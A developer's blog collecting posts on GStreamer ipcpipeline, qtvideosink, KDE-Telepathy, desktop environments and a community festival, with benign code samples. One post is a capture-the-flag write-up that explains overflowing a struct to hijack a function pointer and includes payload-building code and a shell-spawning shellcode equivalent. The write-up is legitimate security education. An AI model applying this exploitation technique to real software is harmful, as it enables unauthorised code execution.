Gkiagia’s Blog

ipcpipeline: Splitting a GStreamer pipeline into multiple processes (17 November 2017)

Earlier this year I worked on a GStreamer plugin called “ipcpipeline”. This plugin provides elements that make it possible to interconnect GStreamer pipelines running in different processes. In this blog post I am going to explain how this plugin works and why you might want to use it in your application.

Why ipcpipeline?

In GStreamer, pipelines are meant to be built and run inside a single process. Normally, one wouldn’t even think about involving multiple processes for a single pipeline. You can (and should) involve multiple threads, of course, which is easily done using the queue element, in order to do parallel processing. But if multiple threads are enough, why would you want to involve multiple processes as well?

Splitting part of a pipeline into a different process is useful when one or more elements need to be isolated for security reasons. Imagine an application that uses a hardware video decoder and therefore has device access privileges. Imagine also that the same pipeline contains elements that download and parse video content directly from a network server, as most Video On Demand applications do. I don’t mean to say that GStreamer is insecure, but it can be a good idea to think ahead and make it as hard as possible for an attacker to take advantage of potential security flaws. In theory, someone could exploit a bug in the container parser by sending it crafted data from a fake server, and then use those device access privileges to take control of other things or cause a system crash. ipcpipeline can help prevent that.

How does it work?

The (oversimplified) diagram below shows what the media pipeline of a video player looks like with GStreamer:

With ipcpipeline, this pipeline can be split into two processes, like this:

As you can see, the split mainly involves two elements: ipcpipelinesink, which serves as the sink of the first pipeline, and ipcpipelinesrc, which serves as the source of the second pipeline. These two elements internally talk to each other through a unix pipe or socket, transferring buffers, events, queries and messages over it, thus linking the two pipelines together.

This mechanism doesn’t look very special, though. You might be wondering at this point: what is the difference between using ipcpipeline and an existing mechanism like a pair of fdsink/fdsrc, udpsink/udpsrc, or RTP? What is special about these elements is that the two pipelines behave as if they were a single pipeline, with the elements of the second one being part of a GstBin in the first one:

The diagram above illustrates how you can think of a pipeline that uses the ipcpipeline mechanism. As you can see, ipcpipelinesink behaves as a GstBin that contains the whole remote pipeline. This practically means that whenever you change the state of ipcpipelinesink, the remote pipeline’s state changes as well. It also means that all messages, events and queries that make sense are forwarded from one pipeline to the other, trying to implement as closely as possible the behavior that a GstBin would have.

This design practically allows you to modify an existing application to use this split-pipeline mechanism without having to change the pipeline control logic or implement your own IPC for controlling the second pipeline. It is all integrated in the mechanism already.

ipcpipeline follows a master-slave design: the pipeline that controls the state changes of the other pipeline is called the “master”, while the other one is called the “slave”. In the above example, the pipeline that contains the ipcpipelinesink element is the “master” and the other one is the “slave”. At the time of writing, the opposite setup is not implemented: it is always the downstream part of the pipeline that can be slaved, and ipcpipelinesink is always on the “master” side.
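
To make this more concrete, below is a minimal sketch of the master process, under a few assumptions: the fdin/fdout properties that the ipcpipeline elements expose for their communication channel, the ipcslavepipeline element on the slave side, and a hypothetical video.mp4 input. Error handling, the demuxers/decoders and the fork/exec of the slave process are omitted.

#include <gst/gst.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    gst_init(&argc, &argv);

    // One end of this socketpair stays in the master; the other end
    // is inherited by the slave process (e.g. across fork()/exec()).
    int fds[2];
    socketpair(AF_UNIX, SOCK_STREAM, 0, fds);

    // Master process: filesrc ! ipcpipelinesink
    // (real setups would put the demuxer/parser here as well)
    GstElement *master = gst_pipeline_new("master");
    GstElement *src    = gst_element_factory_make("filesrc", NULL);
    GstElement *ipsink = gst_element_factory_make("ipcpipelinesink", NULL);
    g_object_set(src, "location", "video.mp4", NULL);
    g_object_set(ipsink, "fdin", fds[0], "fdout", fds[0], NULL);
    gst_bin_add_many(GST_BIN(master), src, ipsink, NULL);
    gst_element_link(src, ipsink);

    // Setting the master to PLAYING also drives the slave to PLAYING;
    // no explicit IPC is needed in the application code.
    gst_element_set_state(master, GST_STATE_PLAYING);

    // Slave process (sketch): ipcpipelinesrc ! decodebin ! sink
    // GstElement *slave = gst_element_factory_make("ipcslavepipeline", NULL);
    // GstElement *ipsrc = gst_element_factory_make("ipcpipelinesrc", NULL);
    // g_object_set(ipsrc, "fdin", fds[1], "fdout", fds[1], NULL);
    // ... add/link the decoder and sink, but never set the state manually:
    // the slave follows the master's state changes.

    GMainLoop *loop = g_main_loop_new(NULL, FALSE);
    g_main_loop_run(loop);
    return 0;
}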

While there can be only one “master” pipeline, it is possible to have multiple “slave” ones. This allows, for example, splitting an audio decoder and a video decoder into different processes:

It is also possible to have multiple ipcpipelinesink elements connect to the same slave pipeline. In this case, the slave pipeline will follow whichever of the states it gets from the two ipcpipelinesinks is closest to PLAYING. Also, messages from the slave pipeline will only be forwarded through one of the two ipcpipelinesinks, so you will not notice any duplicate messages. Behavior should be exactly the same as in the split slaves scenario.

Where is the code?

ipcpipeline is part of the gst-plugins-bad module. Documentation is included with the code, and there are also some examples that you can try out to get familiar with it. Happy hacking!

On desktop environments – part 1: the journey (5 May 2016)

Disclaimer: This blog post contains a lot of flame-starter material. Please note that this is all just my personal opinion at the time of writing and it may well conflict with yours. Please have your fire extinguishers ready to cool yourselves down and prevent the flames from advancing to the comment section of this post. Thank you in advance.

Exploring the desktop environments land

When I first started using GNU/Linux, back around 2005 I believe, my very first desktop environment was KDE 3. Actually, it was KDE 2, but soon I realized that the distribution I had on CD-ROM was quite old at that point in time, so I decided to try a more modern one. KDE 3 served me quite well at the time. All the applications I was using were working pretty well and the desktop was quite nice and also familiar, coming from a Windows background. On KDE 3 I learned to program my first UI applications, thanks to the powerful Qt Designer, and I was pretty happy about everything.

Later on, around 2008, I decided to join the KDE community and help with the effort of making KDE 4 the best desktop environment ever. In the KDE community I have been involved in many areas, starting from kwrited (yes, with a ‘d’ at the end; a pretty useless component that most people have no idea exists), then Kopete, KDE-Telepathy, DrKonqi, KCrash, Krdc, as well as Debian KDE packaging, general bugfixing, triaging and other things…

Not many years later, though, I got disappointed by the “KDE Plasma Desktop” (meaning the desktop environment as a whole, not the individual libraries and applications). I realized that my vision of making KDE 4 the best desktop environment could not realistically be achieved, and since in my work at Collabora I was dealing a lot with GLib/GNOME libraries and applications, I decided to switch to GNOME. I did that as a trial for myself, in order to experience and understand better that side of the desktop environments land.

Almost three years later, I got fed up and concluded that I didn’t like GNOME. Many details contributed to that conclusion… the non-existent configuration in applications, the (too-much-)space-wasting default Adwaita theme, the controversial client-side decorations, the forceful gnome-shell plugin API breaks every now and then (which effectively disable all your gnome-shell plugins and give you a nice reminder kick that you have to switch to another DE :P), the somewhat unnatural feel of gnome-terminal (I never got used to it; I kept using konsole instead), the horrible open/save file dialogs, and other little things…

Design matters

To be fair though, GNOME is not a bad desktop environment as a whole. It’s not bad at all. Actually, it’s probably the best one! Why? Because it is well designed. The gnome-shell looks really good! It also feels good: it is very fast and responsive (unlike plasma-desktop, sorry…). The functions of the shell all have a meaning (unlike plasma-desktop again, with all those useless widgets), and it is easy to find your way to them. The applications shipped by default all work well, have a clear purpose and integrate well with the rest of the desktop. The names on the application icons actually make sense. GDM also looks pretty good and is very easy to use. In addition, the environment is very well integrated with technologies that automate things a desktop needs, such as network management, volume control, power management, bluetooth, etc. All these features really look and behave as if they are part of the desktop, and although they are not very configurable, the defaults are really sensible and well thought out. The overall feeling of GNOME for me is really the best. But still, I don’t really like it…

The journey continues

After coming to that conclusion, I wanted to find myself something better. Unfortunately, there are not that many options out there. Mate, Cinnamon, Unity, etc. are too GNOME-like (and not necessarily better). Others are not as mature and do not really deliver some of the features I wanted. Soon, I found myself back trying KDE again. I instantly made two observations: first, KWin is awesome, possibly the best floating window manager on X11 (and soon on Wayland too \o/); second, some KDE applications are irreplaceable… Kate, Konsole, Dolphin, Okular… they are the best. Unfortunately, the rest of the KDE Plasma Desktop was still not really up to the equivalent GNOME standards, so that was still not an option for me.

Finally, I concluded that there is no existing desktop environment that suits me. However, noticing that there are some awesome pieces of software out there, I thought that perhaps I could sort-of create my own desktop by combining good components from existing DE projects. In the next part of this blog post, I am going to describe the setup that I have currently ended up experimenting with.

GStreamer on wayland with GTK+ (10 June 2014)

During the past few months I’ve been occasionally working on integrating GStreamer better with wayland. GStreamer already has a ‘waylandsink’ element in gst-plugins-bad, but the implementation is very limited. One of the things I’ve been working on was to add GstVideoOverlay support to it, and recently I managed to make this work nicely embedded in a GTK+ window.
[Video: GTK+ video player demo running on weston]

I’m happy to say that it works pretty well, even though GTK does not support wayland sub-surfaces, which was initially thought to be a problem. It turns out there is no problem with that, and the GTK and GstVideoOverlay APIs are both sufficient to make this work. However, a small addition is needed in GstVideoOverlay to allow smooth resizing. Currently, I have a GstWaylandVideo API that includes those additions.
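
For context, here is roughly the generic GstVideoOverlay embedding pattern an application uses (a sketch with the stock API; the wayland-specific handle type and the GstWaylandVideo additions mentioned above are not shown):

#include <gst/gst.h>
#include <gst/video/videooverlay.h>

// When the video sink is ready to render, it posts a
// "prepare-window-handle" message; the application answers with the
// native handle of the surface the video should be drawn into.
// The handle value itself is platform-specific.
static GstBusSyncReply
bus_sync_handler(GstBus *bus, GstMessage *msg, gpointer user_data)
{
    if (!gst_is_video_overlay_prepare_window_handle_message(msg))
        return GST_BUS_PASS;

    guintptr handle = *(guintptr *) user_data;  // e.g. from the GTK+ widget
    gst_video_overlay_set_window_handle(
        GST_VIDEO_OVERLAY(GST_MESSAGE_SRC(msg)), handle);

    gst_message_unref(msg);
    return GST_BUS_DROP;
}

// Installed on the pipeline's bus with:
//   gst_bus_set_sync_handler(bus, bus_sync_handler, &handle, NULL);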

This essentially means that as soon as this work is merged (hopefully soon), there is nothing stopping applications like totem from being ported to wayland.

I believe embedding waylandsink in Qt should also work without any problems; I just haven’t tested it.

If you are interested, check out the code. The code of the demo shown above is also available, and there is a ticket tracking the merge of this branch.

I should say many thanks here to my employer, Collabora, for sponsoring this work.

CommonsFest (29 April 2014)

Hello all! Long time no blog. The reason I decided to blog this time is that I want to spread the word about CommonsFest, a different kind of festival that will take place in less than two weeks (9-11 May) in my home city, Heraklion, in Crete.

What is it?

CommonsFest is a festival that aims to promote freedom of knowledge (or free knowledge) and peer-to-peer collaboration for the creation and management of the Commons: a philosophy that has spread through free software communities and extends to many aspects of our daily lives, such as the arts, governance, construction of machinery, tools and other goods. In other words, it aims to raise people’s awareness of the open source philosophy in its generalised form, covering open source code, open hardware, creative commons and similar initiatives like open source ecology, open governance, etc.

Why?

This festival was conceived and organized for the first time in Heraklion last year by a group of volunteers, myself being one of them, who felt that this philosophy is worth promoting to people who are unaware of its existence, especially in this time of economic crisis, where it is clear that people need to cooperate and share more in order to move forward. This year we are repeating it, aiming to be better and achieve even more. Our long-term vision is to spread this philosophy to as many people as possible around the world and eventually improve our lives by changing the way people think. We believe that the world would be a better place if we all shared our knowledge and worked together, equally, for the well-being of all of us.

I love the idea, how can I be part of it?

There are many ways you can help. First of all, this year the festival is crowd-funded to cover our expenses (mainly printing and transportation for the speakers). If you like the idea and would like to support us directly, you could give a small donation. Another way you can help is to just share this with other people that may (or may not) be interested – even if it’s just to raise their awareness about the subject ;). Finally, you could help achieve our goals by organizing something similar in your area. All our material (logos, texts, slideshows, etc.) is freely licensed under creative commons licences, so you can use it too if you want.

Where can I learn more?

Video calls in KDE-Telepathy (29 March 2012)

Well, I think I owed you this one. Remember back in 2009, when I was working on KCall as part of the GSoC program? Well, it may have taken 2.5 more years, but I’m now pleased to announce that it’s finally in a ready-to-use state \o/ Don’t expect it to be perfect, of course. It still has a long way to go.

A little bit of history

When my GSoC finished in 2009, there were two main problems with KCall. The first one was that the bits of the telepathy specification for doing calls (i.e. the “StreamedMedia” channel type) were problematic, not to mention that the API of the telepathy-farsight library, which was the only way to use StreamedMedia, was also weird; it took me too many tries to finally understand it (in late 2010…), which in simple words means that KCall was very unstable because it used the API in the wrong way (if there really was a right way to use it…). The second problem was that there was no telepathy integration in the KDE desktop, so KCall would need to have a proper contact list, account manager and other stuff that it shouldn’t have to implement.

In late 2010, the KDE-Telepathy project started evolving, and last summer we finally managed to make a first release with the necessary components to use telepathy on the KDE desktop. At about the same time, work began on a new API for doing calls in telepathy, the so-called “Call” channel type, plus telepathy-farstream, the new and enhanced version of telepathy-farsight. It took a little longer than expected, but finally, a few weeks ago, thanks to the awesome work of my colleagues at Collabora who engineered the whole thing, the “Call” API and telepathy-farstream were finished and released. Fortunately, last year I had already worked on porting the call-ui to the draft Call API, using the draft telepathy-qt Call bindings that used to be in the telepathy-qt4-yell module. So, now I only had to first update the telepathy-qt bindings to the latest and greatest API specification and then do the same with the call-ui, plus fix up the UI a bit, which was way too ugly. And so I did.

The present and the future

The UI is far from perfect at the moment, but the engine seems to work reliably. I have many additions and improvements in mind. However, since I suck at UI design, I’d love to have mockups of ideas from people who can actually design UIs. And I’d also love to have other people implement those ideas, since I’m a lazy man… (ok, I don’t really mean that). So, if you feel like helping (either way), this is your chance to get involved.

The current UI will be included in the next KDE-Telepathy release, 0.4, which is scheduled for next month. Be prepared.

Try it

So, if you can’t wait for the next KDE-Telepathy release and want to try this now, what you need is the latest ktp-call-ui from git master with all of its dependencies. To make a call, simply right-click one of your contacts in the contact list and click “audio call” or “video call”. Alternatively, you can do this directly from the text-ui or the contact plasmoid. Note that older versions of those components also have audio/video call buttons, but they will try to start StreamedMedia calls instead, which will fail. Also note that calls require XMPP (jabber, google talk) at the moment, but SIP support is also on its way upstream.

Introducing qtvideosink – GStreamer meets QML (9 February 2012)

During the past month I’ve been working on a new GStreamer element called qtvideosink. The purpose of this element is to allow painting video frames from GStreamer on any kind of Qt surface and on any platform supported by Qt. A “Qt surface” can be a QWidget, a QGraphicsItem in a QGraphicsView, a QDeclarativeItem in a QDeclarativeView, and even an off-screen surface like a QImage, QPixmap, QGLPixelBuffer, etc. The initial reason for working on this new element was to support GStreamer video in QML, which is something many people have asked me about in the past. Until now, only QtMultimedia supported this, with some code in phonon being in progress as well. The main disadvantage of both QtMultimedia and phonon is that although they support this feature with GStreamer as the backend, they don’t allow you to mix pure GStreamer code with their QML video item, so they are useless in case you need to do something more advanced using the GStreamer API directly. Hence the need for something new.

My idea with qtvideosink was to implement something that would be a standalone GStreamer element, which would not require the developer to use a specific high-level API in order to paint video on QML. In the past I had also written another similar element, qwidgetvideosink, which is basically the same idea, but for QWidgets. After looking at the problem a bit more carefully, I realized that qwidgetvideosink and qtvideosink would in fact share a lot of their internal logic, and therefore I could probably make one element generic enough to paint both on QWidgets and on QML, and perhaps more surfaces. And so I did.

I started by taking the code of qtgst-qmlsink, a project that was started by a colleague here at Collabora last year with basically the same intention, but which was never finished properly. This project was initially based on QtMultimedia’s GStreamer backend. As a first step, I did some major refactoring to clean it up from its QtMultimedia dependencies and to make it an independent GStreamer plugin (it used to be a library). Then I merged it with qwidgetvideosink, so that they can share the common parts of the code, and also wrote a unit test for it. Sadly, the unit test proved something I had already suspected: the original QtMultimedia code was quite buggy. But I must say I enjoyed fixing it. It was a good opportunity for me to learn a lot about video formats and OpenGL.

How does it work?

First of all, you can create the sink with the standard gst_element_factory_make method (or its equivalent in the various bindings). You will notice that this sink provides two signals: an action signal (a slot in Qt terminology) called “paint” and a normal signal called “update”. “update” is emitted every time the sink needs the surface to be repainted; it is meant to be connected directly to QWidget::update(), QGraphicsItem::update() or something similar. The “paint” slot takes a QPainter pointer and a rectangle (x, y, width, height as qreals) as its arguments and paints the video inside the given rectangle using the given painter; it is meant to be called from the widget’s paint event or the graphics item’s paint() function. So, all you need to do is take care of those two signals and qtvideosink will do everything else.
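
Here is a minimal sketch of what that looks like from a custom QWidget, going by the signal contract just described (the exact marshalling of the signal arguments is my assumption):

#include <QtGui/QWidget>
#include <QtGui/QPainter>
#include <gst/gst.h>

class VideoWidget : public QWidget
{
public:
    explicit VideoWidget(GstElement *sink, QWidget *parent = 0)
        : QWidget(parent), m_sink(sink)
    {
        // "update" fires when a new frame is ready; it may come from a
        // streaming thread, so queue the repaint on the GUI thread.
        g_signal_connect(m_sink, "update", G_CALLBACK(onUpdate), this);
    }

protected:
    void paintEvent(QPaintEvent *)
    {
        QPainter painter(this);
        // Ask the sink to paint the current frame into our rectangle.
        g_signal_emit_by_name(m_sink, "paint", &painter,
                              qreal(0), qreal(0),
                              qreal(width()), qreal(height()));
    }

private:
    static void onUpdate(GstElement *, gpointer data)
    {
        QMetaObject::invokeMethod(static_cast<QWidget *>(data), "update",
                                  Qt::QueuedConnection);
    }

    GstElement *m_sink;
};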

Getting OpenGL into the game

You may be wondering how this sink does the actual painting: using QPainter, using OpenGL, or maybe something else? Well, there are actually two variants of this video sink. The first one, qtvideosink, just uses QPainter. It can only handle RGB data (only a subset of the formats that QImage supports) and does format conversion and scaling in software. The second one, qtglvideosink, uses OpenGL/OpenGLES with shaders. It can handle both RGB and YUV formats and does format conversion and scaling in hardware. It is used in exactly the same way as qtvideosink, but it requires a QGLContext pointer to be set on its “glcontext” property before its state is set to READY. This of course means that the underlying surface must support OpenGL (i.e. it must be one of QGLWidget, QGLPixelBuffer or QGLFramebufferObject). To get this working on QGraphicsView/QML, you just need to set a QGLWidget as the viewport of the QGraphicsView and use this widget’s QGLContext in the sink.
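
In code, that setup would look roughly like this (a sketch, using the “glcontext” property described above):

#include <QtOpenGL/QGLWidget>
#include <QtGui/QGraphicsView>
#include <gst/gst.h>

GstElement *makeGlSink(QGraphicsView *view)
{
    // Give the view an OpenGL viewport, then hand its context to the
    // sink before taking the sink to READY.
    QGLWidget *glWidget = new QGLWidget;
    view->setViewport(glWidget);

    GstElement *sink = gst_element_factory_make("qtglvideosink", NULL);
    g_object_set(sink, "glcontext",
                 (gpointer) const_cast<QGLContext *>(glWidget->context()),
                 NULL);
    gst_element_set_state(sink, GST_STATE_READY);
    return sink;
}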

qtglvideosink uses either GLSL shaders or ARB fragment program shaders if GLSL is not supported. This means it should work on pretty much every GPU/driver combination that exists for linux, on both desktop and embedded systems. In case no shaders are supported, it will fail to change its state to READY, and then you can just substitute it with qtvideosink, which is guaranteed to work on all platforms supported by Qt.

qtglvideosink also has an extra feature: it supports the GstColorBalance interface. Color adjustment is done in the shaders together with the format conversion. qtvideosink doesn’t support this, as it doesn’t make sense there: color adjustment would need to be implemented in software, and that is better done by plugging a videobalance element before the sink. No need to duplicate code.

So, which variant to use?

If you are interested in painting video on QGraphicsView/QML, then qtglvideosink is the best choice of all sinks, and if for any reason the system doesn’t support OpenGL shaders, qtvideosink is the next choice. If you intend to paint video on normal QWidgets, it is best to use one of the standard GStreamer sinks for your platform, unless you have a reason not to. QWidgets can be turned into native system windows by calling their winId() method, and therefore any sink that implements the GstXOverlay interface can be embedded in them; on X11, for example, xvimagesink is the best choice. However, if you need to do something more tricky and embedding another window doesn’t suit you well, you could use qtglvideosink in a QGLWidget (preferably) or qtvideosink / qwidgetvideosink on a standard QWidget.

Note that qwidgetvideosink is basically the same thing as qtvideosink, with the difference that it takes a QWidget pointer in its “widget” property and handles everything internally for painting on that widget. It has no signals. Other than that, it still does painting in software with QPainter, just like qtvideosink. It is there mainly to keep compatibility with code that may already be using it, as it already exists in QtGStreamer 0.10.1.

This is actually 0.10 stuff… What about GStreamer 0.11/1.0?

Well, if you are interested in 0.11, you will be happy to hear that there is already a partial 0.11 port around. Two weeks ago I was at the GStreamer 1.0 hackfest in Malaga, Spain, and one of the things I did there was porting qtvideosink to 0.11. I must say the port was quite easy to do. However, last week I added some more stuff to the 0.10 version that I haven’t ported to 0.11 yet. I’ll get to that soon; it shouldn’t take long.

Try it out

The code lives in the qt-gstreamer repository. The actual video sinks are independent from the qt-gstreamer bindings, but qt-gstreamer itself has some helper classes for using them. Firstly, there is QGst::Ui::VideoWidget, a QWidget subclass that will accept qtvideosink, qtglvideosink and qwidgetvideosink just like any other video sink and will transparently do all the required work to paint the video in it. Secondly, there are QGst::Ui::GraphicsVideoWidget and QGst::Ui::GraphicsVideoSurface. Those two are meant to be used together to paint video on a QGraphicsView or QML. You can find more about them in the documentation in graphicsvideosurface.h (this will soon be on the documentation website). Finally, there is a QtGStreamer QML plugin, which exports a “VideoItem” element if you “import QtGStreamer 0.10”. This is also documented in the GraphicsVideoSurface header. All of this will soon be released in the upcoming qt-gstreamer 0.10.2.
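
As a rough usage sketch of the graphics view helpers (method names as I recall them; check graphicsvideosurface.h for the authoritative API):

#include <QGst/Ui/GraphicsVideoSurface>
#include <QGst/Ui/GraphicsVideoWidget>
#include <QtGui/QGraphicsView>
#include <QtGui/QGraphicsScene>

// One surface per view; it creates the appropriate qt(gl)videosink
// internally and exposes it for use in a GStreamer pipeline.
void setupVideo(QGraphicsView *view, QGraphicsScene *scene)
{
    QGst::Ui::GraphicsVideoSurface *surface =
        new QGst::Ui::GraphicsVideoSurface(view);

    // Link surface->videoSink() as the sink of your pipeline...

    // ...and show the video through a widget item in the scene.
    QGst::Ui::GraphicsVideoWidget *widget =
        new QGst::Ui::GraphicsVideoWidget;
    widget->setSurface(surface);
    scene->addItem(widget);
}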

Telepathy-KDE technical preview released / See you at the BDS (2 August 2011)

So, last week we released the first version (technical preview) of Telepathy-KDE, along with KDE SC 4.7. The release is separate from the KDE SC (it’s just a technical preview and hasn’t gone through kdereview yet); it just happened to be released at the same time. I would like to thank everyone in the team for making this release possible after all those years that this project has been sitting in playground, and especially David and Martin, who did most of the hard work lately. If you want to try it, check with your distribution for binary packages or compile it from source.

In other news, I am going to the Desktop Summit this year. See you all there!

fosscomm 2011 – fosswar exploit challenge solution (15 May 2011)

Last weekend I went to fosscomm 2011, a Greek conference on Free and Open Source Software, at the University of Patras, together with my friend Nick Kossifidis (mickflemm). I can say we had a wonderful time there. I met many interesting people, some that I knew from the internet already and some that I didn’t, I attended many interesting talks on topics of which I had limited or no knowledge, and I also took part in fosswar, a wargames competition that had some quite interesting challenges.

Fosswar was very exciting. There were five challenges, and people were organized in teams, splitting the challenges between them or collaborating on some of them. When it started, there was no room to sit with my laptop, so I stayed for some time trying to help my friend with the challenge he had started solving (challenge 5, reverse engineering). A little later some people left, so I thought, why not start solving challenge 4 (exploitation), which nobody in my friend’s team had started yet. And so I did…

In this challenge, we were given the source code of a C program that had an exploitable security hole that we had to exploit. The program works like this: Initially, it allocates an array of many “struct bogus”, where “struct bogus” is:

struct bogus {
    size_t magic;
    fptr f;
    char buffer[16];
} bogus_t;

This array is dynamically allocated with mmap() at a predefined memory address (0x80000000). After that, the program fills the buffers of all the “struct bogus” with the character ‘M’ (0x4D), the magic numbers with ~0 (0xFFFFFFFF on 32-bit, 0xFFFFFFFFFFFFFFFF on 64-bit) and the function pointers (fptr f) with 0. When everything is initialized, it starts reading from stdin and places whatever it reads in a 1KB buffer on the stack. Then it copies the contents of this buffer to the 16-byte buffer of a random “struct bogus” in the array, and finally it iterates over all the “struct bogus” in the array, starting from the second one, verifying that their magic number is still ~0 and executing the function f if the function pointer f is not null. Ok, this is not the most useful program in the world; it is *made* to be exploited. So, let’s see how this can be done.

One might think that reading from stdin into a buffer on the stack looks like a possible stack overflow. However, this is not the case here, since the call to read() uses sizeof(buffer) - 1 as the maximum size, so one cannot inject more than 1KB of data into this buffer. But when this 1KB buffer is copied to the 16-byte buffer of one of the “struct bogus”, there is no size check! Therefore, it is possible to write more than 16 bytes and overwrite the contents of the following “struct bogus” in the array. And since those structs have a function pointer that is called if it is not null, one can set this pointer to point to the injected data in the array and put some nice assembly instructions there.
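
Putting the description together, the relevant part of the challenge program looks roughly like this. This is a reconstruction from the description, not the original source; the array size, names and the exact copy call are assumptions:

#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define NSTRUCTS 1024                            /* assumed array size */

typedef void (*fptr)(void);

struct bogus {
    size_t magic;
    fptr f;
    char buffer[16];
};

void challenge(struct bogus *map)                /* mmap()ed at 0x80000000 */
{
    char buf[1024];
    ssize_t n = read(0, buf, sizeof(buf) - 1);   /* bounded: no stack smash */

    struct bogus *victim = &map[rand() % NSTRUCTS];
    memcpy(victim->buffer, buf, n);              /* NO size check: overflow! */

    for (size_t i = 1; i < NSTRUCTS; i++) {      /* starts from the second */
        if (map[i].magic != (size_t) ~0)
            exit(1);                             /* integrity check */
        if (map[i].f)
            map[i].f();                          /* jump through the pointer */
    }
}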

So far so good, but there is one remaining problem: we don’t know the exact address of the “struct bogus” that we have access to, because the index in the array where our data is written is chosen with rand(). That’s where a few more lines of the challenge source become useful.

That part looks weird at first sight. What it does is fill the first 5 bytes of the aforementioned array (the map pointer) with 0xe9, followed by a number that is the relative number of bytes from the 5th byte of the array to the beginning of the “buffer” member of the “struct bogus” right after the one that we have access to. After googling a bit, one can find that 0xe9 is in fact the opcode of the x86 JMP instruction, and the number is exactly the offset needed to jump to the first byte of that buffer.

My payload therefore fills the 16 bytes of the “buffer” member with 0x4D (the value that was already there from the initialization; anything else would also work), then overwrites the next “struct bogus”, placing 0xFFFFFFFF on the magic number (required, else the check will fail), 0x80000000 on the function pointer (the beginning of the array, where the JMP instruction is) and a shellcode on the rest of it. The shellcode can be as long as we want, since execution is never going to go further than this point, so the magic number of the struct after that doesn’t need to be correct.
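
Sketched for the 32-bit case, with the struct layout shown earlier, building the payload looks like this (a reconstruction; “shellcode” stands for whatever code you inject):

#include <string.h>
#include <stdint.h>

/* Build the overflow payload: it lands at our struct's "buffer"
 * member, so everything past the first 16 bytes spills into the
 * next struct (32-bit layout assumed). */
size_t build_payload(unsigned char *out,
                     const unsigned char *shellcode, size_t len)
{
    memset(out, 0x4D, 16);                 /* our own buffer: filler      */

    uint32_t magic = 0xFFFFFFFF;           /* keep next struct's check OK */
    uint32_t f     = 0x80000000;           /* next struct's fptr -> JMP   */
    memcpy(out + 16, &magic, sizeof(magic));
    memcpy(out + 20, &f, sizeof(f));

    memcpy(out + 24, shellcode, len);      /* next struct's buffer: the   */
                                           /* JMP at 0x80000000 lands here */
    return 24 + len;
}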

The fun here was not exploiting the program, but creating a shellcode that does something useful! I had never done this before, and I also had limited knowledge of the x86 instruction set and how linux system calls work, but after some research I managed it (although I did this at home, later, not during the competition; during the competition I was only able to see in gdb that $eip changes and points to this address in my data, and then it crashed). With some help from existing shellcodes on the internet, I wrote a shellcode that invokes /bin/sh after setting stdin to be the same as stdout.

I had to do the dup2() call because when running the program on the shell like “./exp < input_x86”, stdin is the input file, and when the shell executes, the file is already at its end, so the shell exits due to EOF. After setting stdin equal to stdout (which is the terminal device), input on the shell works fine.
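
Expressed in C rather than assembly, the shellcode does the equivalent of the following (a behavioural sketch, not the original listing):

#include <unistd.h>

void shellcode_equivalent(void)
{
    char *const argv[] = { (char *) "/bin/sh", (char *) 0 };

    dup2(1, 0);                    /* make stdin the same as stdout */
    execve("/bin/sh", argv, 0);    /* replace the process with a shell */
}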

That’s it! I hope you found it interesting too. If you are interested, there are writeups about the other challenges as well.

QtGStreamer 0.10.1 (25 January 2011)

This weekend I released QtGStreamer 0.10.1, the first stable version of QtGStreamer. This release marks the beginning of the stable 0.10 series of QtGStreamer, which will continue for the lifetime of GStreamer 0.10. For those of you that don’t yet know what QtGStreamer is: it is a set of libraries that provide Qt-style C++ bindings for GStreamer, plus extra helper classes and elements for better integration of GStreamer in Qt applications.

I must say thanks a lot to Mauricio, the co-developer of QtGStreamer, who helped me a lot with the design and code; to the GStreamer community, who accepted this project under the GStreamer umbrella with great enthusiasm; to Nokia, for sponsoring it; to Collabora, for assigning me and Mauricio to work on it; and to all those developers who are already using it in their projects and have helped us by providing feedback.

The future

Development, of course, does not stop here; it has just started. We will try to improve the bindings as much as we can by exporting more and more of GStreamer’s functionality, by adding more convenience methods/classes and/or gstreamer elements that ease the use of GStreamer in Qt applications, and by collecting opinions and ideas from all of you out there who will use this API. This last bit is quite important imho, so if you have any suggestions about things that you don’t like or things that you would like to see implemented, please file a bug to let us know.

Use in KDE

I am quite happy to see that this library already has early adopters in KDE. Apart, of course, from my telepathy-kde-call-ui (ex-KCall), which is the “father” of QtGStreamer, QtGStreamer is also used in kamoso, a cheese-like camera app, whose authors, Alex Fiestas and Aleix Pol, have been very patient waiting for me to release QtGStreamer before they release kamoso and have also been very supportive during all this time (thanks!).

Personal thoughts

I must say this project was fun to develop. During development, I learned a lot about C++ that I didn’t know before, and I also learned how GObject works, which I must say is quite interesting, although ugly for my taste. Learning more about C++ was my main source of interest from the beginning of the project, and for some period of time I couldn’t even imagine that this project would ever reach this point, but I kept coding it for myself. Obviously, I am more than happy now that it finally evolved into something that is also useful for others and has wide acceptance.

What is Telepathy-KDE (20 September 2010)

There seems to be a lot of confusion about what the Telepathy-KDE project is and what it has to do with Kopete. I’ll try to explain everything in this blog post, so that it is clear to everyone.

First of all, Telepathy is a framework for writing applications that can use real-time communication and collaboration features. In Telepathy there are the so-called connection managers, which connect to IM and similar networks, and the clients, which use those connections over D-Bus. This allows dividing the several tasks of an IM client among several applications, which makes it easier to reuse code and easier for applications to add collaboration features without caring about protocols, contact lists, presence status and all that stuff.

In Telepathy-KDE, what we are trying to do is integrate Telepathy with the KDE Plasma desktop. What we imagine is not a monolithic IM client like kopete or empathy, but all the features of an IM client integrated directly into the desktop. For this reason, we are going to add the following components to the KDE SC:

A presence plasmoid. This will be a plasmoid sitting in your notification area or somewhere else, showing your online status and allowing you with a popup to change status, to enter a status message, etc…

A contact list application. This will be a standalone application that will just show the contact list. It will of course have all the necessary actions to start a chat or a call or do something else with any of your contacts.

A chat window application. This will be a standalone application providing just the chat window. When a new chat starts, it will be auto-launched via D-Bus service activation and allow you to chat.

A VoIP call window application. This will again be a standalone application providing the call window, also auto-launched to handle calls. This is actually KCall, the one I wrote in last year’s Summer of Code, but it won’t have the contact list and won’t be named “KCall”.

An approver daemon. This will be a daemon sitting in the background and listening for incoming channels. When somebody requests to start doing something with you (be it a chat, a video call, playing a game together, sharing your desktop, etc…), it will show a KNotify popup allowing you to accept or reject the request.

A file transfer daemon. This will be a daemon that will be auto-launched like the chat and call windows when you want to do a file transfer to or from one of your contacts and handle that file transfer for you.

The nepomuk integration daemon. This is an implementation detail, really internal, not shown to the users. It will allow you to have metacontacts by pushing all of your contacts into the nepomuk database and defining relations between them. It will also, at some point, allow sharing contacts with akonadi and other cool stuff.

